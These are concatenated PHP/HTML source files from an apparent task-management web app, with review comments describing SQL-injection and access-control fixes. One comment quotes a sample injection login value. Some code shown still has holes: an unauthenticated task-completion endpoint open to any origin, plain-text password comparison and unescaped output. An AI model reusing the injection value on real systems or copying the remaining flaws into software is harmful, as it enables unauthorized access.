console.log(request.responseText);
}
})
}
});
</script>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body>
</html><file_sep><?php
class User
{
    // PDO connection injected by the caller.
    private $conn;
    // Backing table name.
    private $table = 'users';

    public $id;
    public $username;
    public $password;
    public $type;

    /**
     * @param PDO $db open database connection.
     */
    public function __construct($db)
    {
        $this->conn = $db;
    }

    /**
     * Fetch all users joined with their type name, ordered by type id.
     * @return PDOStatement executed statement ready for fetching.
     */
    public function read(){
        $query='SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type ORDER BY t.id ASC';
        $stmt=$this->conn->prepare($query);
        $stmt->execute();
        return $stmt;
    }

    /**
     * Look up the user matching $this->username / $this->password.
     *
     * BUG FIX: the original interpolated the raw credentials directly into
     * the SQL string, allowing trivial SQL injection (e.g. a username of
     * `" OR "1"="1`). Bound parameters are used instead.
     *
     * NOTE(review): passwords appear to be compared in plain text here —
     * they should be hashed (password_hash/password_verify); confirm the
     * schema before changing.
     *
     * @return PDOStatement executed statement yielding 0 or 1 rows.
     */
    public function login(){
        $query='SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type AND u.username = :username AND u.password = :password';
        $stmt=$this->conn->prepare($query);
        $stmt->bindParam(':username', $this->username);
        $stmt->bindParam(':password', $this->password);
        $stmt->execute();
        return $stmt;
    }
}
session_start();
include('../config/connection.php');

// BUG FIX: the auth check now runs BEFORE the status-update handlers —
// previously an unauthenticated POST could flip any task's status. exit is
// required after every Location header so execution actually stops.
if(!isset($_SESSION["UserId"])){
    header('Location:index.php');
    exit;
}

// Handle the "Complete Task" / "Cancel Task" form posts before any output.
// BUG FIX: the original concatenated $_POST['id'] straight into the SQL
// string (SQL injection); the id is now forced to an integer.
if(isset($_POST['submit'])){
    $id = (int) $_POST['id'];
    $con->query("UPDATE tasks SET status=1 WHERE id=" . $id);
    header('Location:taskDetails.php?id='.$id);
    exit;
}
if(isset($_POST['submitCancel'])){
    $id = (int) $_POST['id'];
    $con->query("UPDATE tasks SET status=3 WHERE id=" . $id);
    header('Location:taskDetails.php?id='.$id);
    exit;
}

// Task id being displayed; echoed into the AJAX calls further down, so it
// is cast to int to prevent script injection into the page.
if(isset($_GET['id'])){
    $id = (int) $_GET['id'];
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<div id="map" style="height: 500px; width: 100%"></div>
<script>
function initMap() {
// Load the task's stored coordinates, then render a Google Map centred
// on them with a single marker (invoked as the Maps API callback).
$.ajax({
url:"../api/task/readById.php",
data:{id:"<?php echo $id?>"},
dataType:"JSON",
success:function(data)
{
// NOTE(review): 'lat' is read from data[0].Longitude and 'lng' from
// data[0].Latitude. This looks swapped, but the task-insert code also
// stores the latitude value in the lng column, so the two swaps cancel
// out. Confirm the column semantics before "fixing" either side alone.
var lat = parseFloat(data[0].Longitude);
var lng = parseFloat(data[0].Latitude);
var location = {lat: lat, lng: lng};
var map = new google.maps.Map(document.getElementById("map"), {
zoom: 13,
center: location
});
var marker = new google.maps.Marker({
position: location,
map: map
});
},error:function (request) {
// Surface server-side failures (e.g. PHP errors) in the console.
console.log(request.responseText);
}
});
}
</script>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=<KEY>&callback=initMap"
type="text/javascript"></script>
<div class="text-center" style="width: 70%; margin: auto; padding: 20px">
<h1 id="title"></h1>
<div id="status"></div>
<div id="description" class="card col-xs-12 col-md-8" style="width: 100%;margin: auto">
</div>
<br><br>
<h2>Deadline:</h2>
<div id="deadline" class="card" style="margin: auto;width: 200px;padding: 12px">
</div>
</div>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<script>
$(document).ready(function () {
// Fetch the task (id injected by PHP) and populate the detail panel.
$.ajax({
url:"../api/task/readById.php",
data:{id:"<?php echo $id?>"},
dataType:"JSON",
success:function(data)
{
$("#title").text(data[0].Name);
// Colour-code the status and, for tasks still in progress, render the
// Complete form (everyone) and the Cancel form (boss/manager only).
if(data[0].Status=="Completed"){
$("#status").append("<h3 style='color: darkgreen'>"+data[0].Status+"</h3>");
}else if(data[0].Status=="In Progress"){
$("#status").append("<h3 style='color: darkorange'>"+data[0].Status+"</h3>");
// NOTE(review): the injected markup nests </form> inside the <a>
// (`<a ...><input ...></form></a>`) — mismatched tags. Browsers
// auto-correct this, but the markup should eventually be fixed.
$("#status").append("<form method='post' action='taskDetails.php'><input type='hidden' name='id' value='"+data[0].TaskId+"'><a id='completeTask'><input type='submit' class='btn btn-primary' style='background-color:#e3a529;border-color:#e3b829;' name='submit' value='Complete Task'></form></a><br>");
if("<?php echo $_SESSION["Type"]?>"=="boss" || "<?php echo $_SESSION["Type"]?>"=="manager"){
$("#status").append("<form method='post' action='taskDetails.php'><input type='hidden' name='id' value='"+data[0].TaskId+"'><a id='cancelTask'><input type='submit' class='btn btn-primary' style='background-color:#e3a529;border-color:#e3b829;' name='submitCancel' value='Cancel Task'></form></a><br><br>");
}
}else if(data[0].Status=="Canceled"){
$("#status").append("<h3 style='color: darkred'>"+data[0].Status+"</h3>");
}
$("#description").text(data[0].Description);
$("#deadline").text(data[0].Time);
},error:function (request) {
// Surface API failures in the console for debugging.
console.log(request.responseText);
}
});
});
</script>
<!-- Optional JavaScript -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body>
</html>
<file_sep><?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');

include_once '../../config/Database.php';
include_once '../../models/Task.php';

// Return every task assigned to the user id given in ?id= as a JSON array.
$database = new Database();
$db = $database->connect();

$task = new Task($db);
// Abort with an empty body when no id was supplied.
$task->id=isset($_GET['id']) ? $_GET['id'] : die();

$result = $task->readByUser();
$num = $result->rowCount();

if($num>0){
    $taskArr = array();
    while ($row=$result->fetch(PDO::FETCH_ASSOC)){
        $taskItem= array(
            'Name'=>$row['Name'],
            'TaskId'=>$row['TaskId'],
            'Description'=>$row['Description'],
            'Time'=>$row['Time'],
            'Worker'=>$row['Worker'],
            'WorkerId'=>$row['WorkerId'],
            'Status'=>$row['Status'],
            'Longitude'=>$row['Longitude'],
            // BUG FIX: the key used to be 'Latitude ' (trailing space), so
            // JS consumers reading data[i].Latitude always got undefined.
            'Latitude'=>$row['Latitude']
        );
        array_push($taskArr, $taskItem);
    }
    echo json_encode($taskArr);
}else{
    echo json_encode(array('message'=>'No tasks found'));
}<file_sep><?php
// CORS / content-type headers for the JSON endpoint.
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
header('Access-Control-Allow-Methods: DELETE');
header('Access-Control-Allow-Headers: Access-Control-Allow-Headers,Content-Type,Access-Control-Allow-Methods, Authorization, X-Requested-With');

include_once '../../config/Database.php';
include_once '../../models/Task.php';

// Mark the task given by ?id= as completed and report the outcome as JSON.
$id = $_GET['id'];

$database = new Database();
$db = $database->connect();

// Model object wrapping the tasks table.
$task = new Task($db);
$task->id = $id;

// Single response shape either way; only the message text differs.
$message = $task->completeTask() ? 'Task Completed' : 'Task Not Completed';
echo json_encode(array('message' => $message));
<file_sep><?php
//session_start();
//if(isset ($_SESSION["Type"])=="banned"){
//echo '<script type="text/javascript">';
// echo ' alert("You have been banned")'; //not showing an alert box.
// echo '</script>';
//header('Location:home.php');
//}
//?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<link href="css/bruh.css" rel="stylesheet">
<title>Task Org</title>
</head>
<body>
<section class="jumbotron text-center">
<div class="container">
<h1 class="jumbotron-heading">Task Org</h1>
<p class="lead text-muted" id="text-hehe">Organise your business with our simple app, less is more!</p>
<p>
<a href="login.php" class="btn btn-primary ">Log in</a>
<a href="register.php" class="btn btn-secondary">Register</a>
</p>
</div>
</section>
<div class="album text-muted">
<div class="container">
<div class="row">
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic1" style="height: 280px; width: 100%; display: block;" src="img/index-participants.jpg" data-holder-rendered="true">
<p class="card-text">Add participants to your project and assign them tasks with time limits and locations!</p>
</div>
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic2" src="img/index-management.jpg" data-holder-rendered="true" style="height: 280px; width: 100%; display: block;">
<p class="card-text">Manage users and change their permissions!</p>
</div>
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic3" src="img/index-eff.png" data-holder-rendered="true" style="height: 280px; width: 100%; display: block;">
<p class="card-text">The most efficient and secure way of doing business.</p>
</div>
</div>
</div>
</div>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
</body>
</html><file_sep><?php
session_start();
include('../config/connection.php');

// BUG FIX: access control now runs BEFORE the insert — the original only
// checked the session/role after handling the POST, so anonymous or
// worker-role POSTs could create tasks. exit is required after header()
// because a Location header alone does not stop execution.
if (!isset($_SESSION["UserId"])) {
    header('Location:index.php');
    exit;
}
if ($_SESSION["Type"]=="worker") {
    header('Location:home.php');
    exit;
}

$check=true;
if (isset($_POST['submit'])) {
    // Name and description must each be present and longer than 4 chars.
    if (!empty($_POST['name']) && strlen($_POST['name']) > 4) {
        $name = $_POST['name'];
    } else {
        $check = false;
    }
    if (!empty($_POST['description']) && strlen($_POST['description']) > 4) {
        $description = $_POST['description'];
    } else {
        $check = false;
    }
    if ($check) {
        // BUG FIX: the original concatenated user input straight into the
        // INSERT statement (SQL injection); use a prepared statement.
        // NOTE(review): the lng/lat constants look swapped (42.428303 is a
        // latitude for Podgorica), but they match how the rest of the app
        // reads them back, so they are kept as-is.
        $stmt = $con->prepare('INSERT INTO tasks(id, name, text, time, userId, lng, lat, status) VALUES (NULL, ?, ?, ?, ?, "42.428303", "19.270615", 2)');
        $date = $_POST['date'];
        $worker = (int) $_POST['worker'];
        $stmt->bind_param('sssi', $name, $description, $date, $worker);
        $stmt->execute();
        header('Location:home.php');
        exit;
    }
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/submitBtn.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<div class="text-center col-xs-12 col-sm-10 col-md-6" style="margin: auto; padding: 20px">
<!-- Material form contact -->
<div class="card">
<h5 class="card-header info-color white-text text-center py-4" style="background-color: #fcb628">
<strong>Create Task</strong>
</h5>
<!--Card content-->
<div class="card-body px-lg-5 pt-0">
<!-- Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>" class="text-center" style="color: #757575;">
<div class="md-form mt-3">
<input type="text" id="name" name="name" class="form-control">
<label for="name">Name</label>
</div>
<div class="md-form">
<input type="text" id="description" name="description" class="form-control">
<label for="description">Description</label>
</div>
<span>Worker</span>
<div class="row d-flex justify-content-center">
<select class="form-control" name="worker" style="width: 180px; align-self: center">
<?php
$upit = "SELECT username,id FROM users WHERE type=2";
$execute = $con->query($upit);
while ($row = $execute->fetch_assoc()){
echo "<option value='".$row['id']."'>".$row['username']."</option>";
}
?>
</select>
</div><br>
<!--date -->
<div class="md-form row d-flex justify-content-center">
<input type="text" name="date" id="date" class="form-control" style="width: 170px">
</div>
<label for="date">Deadline(YYYY-MM-DD)</label>
<!--Map-->
<div id="map" style="height: 500px; width: 100%"></div>
<script>
function initMap() {
    // Centre the location-picker map on Podgorica with a single marker.
    // BUG FIX: the original parsed 19.265580 as latitude and 42.436558 as
    // longitude, which centres the map near the Red Sea; Podgorica is at
    // lat 42.436558, lng 19.265580.
    var lat = parseFloat("42.436558");
    var lng = parseFloat("19.265580");
    var location = {lat: lat, lng: lng};
    var map = new google.maps.Map(document.getElementById("map"), {
        zoom: 13,
        center: location
    });
    var marker = new google.maps.Marker({
        position: location,
        map: map
    });
}
</script>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=<KEY>&callback=initMap"
type="text/javascript"></script>
<!-- Send button -->
<button id="create" class="btn btn-outline-info btn-rounded btn-block z-depth-0 my-4 waves-effect" disabled name="submit" type="submit">Send</button>
</form>
<!-- Form -->
</div>
</div>
<!-- Material form contact -->
</div>
<script>
$(document).ready(function () {
    // Enable the Send button only while #date holds a real YYYY-MM-DD date.
    var DATE_RE = /^\d{4}-\d{2}-\d{2}$/;

    function isValidDate(value) {
        if (!value.match(DATE_RE)) return false;   // wrong textual format
        var parsed = new Date(value);
        var millis = parsed.getTime();
        if (!millis && millis !== 0) return false; // NaN => unparseable date
        // Round-trip through ISO form to reject e.g. 2020-02-31.
        return parsed.toISOString().slice(0, 10) === value;
    }

    $("#date").on('input', function () {
        $("#create").prop("disabled", !isValidDate($("#date").val()));
    });
});
</script>
<!-- Optional JavaScript -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body> | 63422b8d77847c71e6377c9dd8c5459b98f24d2c | [
"SQL",
"PHP"
] | 14 | PHP | NemanjaKk/TaskOrg | d4fff5841a2724e2f96ebbb736df953abdaebdef | e82bccb752548183d3e76239490ea1df913b5338 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.